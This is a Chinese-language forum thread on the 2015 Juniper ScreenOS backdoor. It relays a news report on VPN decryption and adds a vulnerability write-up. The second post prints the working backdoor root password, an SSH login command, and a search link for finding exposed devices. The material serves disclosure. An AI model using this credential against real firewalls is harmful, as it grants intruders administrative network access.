标题:
Juniper防火墙包含未授权代码能解密VPN流量
[打印本页]
作者:
linda
时间:
2015-12-19 23:11
标题:
Juniper防火墙包含未授权代码能解密VPN流量
Juniper Networks
发出警告
,它的防火墙产品NetScreen firewall使用的操作系统包含了“未授权代码”,能悄悄解密VPN流量,给予攻击者管理员访问权限。目前不清楚未授权代码存在了多长时间,又是如何进入到系统的。受影响的系统版本ScreenOS 6.2.0r15-6.2.0r18, 以及6.3.0r12 -6.3.0r20,最早的受影响版本可以上溯至2012年。Juniper的CIO Bob Worrall称,该公司是在最近的一次内部代码审查中发现未授权代码的。该公司表示,没有办法能探测出该漏洞被利用过。纂改系统去解密VPN,看起来此事
最有可能是NSA或其它国家的同行干的
。Edward Snowden泄露的机密文件显示,NSA曾在思科的网络产品中植入后门,它也曾以 Juniper 的防火墙为目标获取永久性的后门访问权限。
原文:
http://www.solidot.org/story?sid=46577
[
本帖最后由 linda 于 2016-2-29 17:47 编辑
]
作者:
linda
时间:
2016-1-6 16:52
标题:
Juniper Networks(瞻博网络)远程管理访问后门
漏洞概要Juniper网络公司(中文名:瞻博网络)致力于实现网络商务模式的转型。作为全球领先的联网和安全性解决方案供应商,Juniper网络公司对依赖网络获得战略性收益的客户一直给予密切关注。公司的客户来自全球各行各业,包括主要的网络运营商、企业、政府机构以及研究和教育机构等。Juniper网络公司推出的一系列联网解决方案,提供所需的安全性和性能来支持全球最大型、最复杂、要求最严格的关键网络。
瞻博网络内部代码审计过程中发现了远程管理访问后门,可允许攻击者通过 SSH 或者 telnet 远程管理访问设备。影响ScreenOS 6.2.0r15—6.2.0r18,6.3.0r12—6.3.0r20版本。
漏洞详情
贡献者
Root
共获得 0KB
漏洞演示使用后门帐号密码登录
使用 root 帐号,配合后门密码 <<< %s(un='%s') = %u
ssh root@ip<<< %s(un='%s') = %u得到 SSH Shell
影响范围通过 ZoomEye 搜索:
https://www.zoomeye.org/search?q=NetScreen+sshd
可以搜索到有 47831 个 NetScreen 防火墙设备。
欢迎光临 中神通公司技术论坛 (http://trustcomputing.com.cn/bbs/)
Powered by Discuz! 6.0.0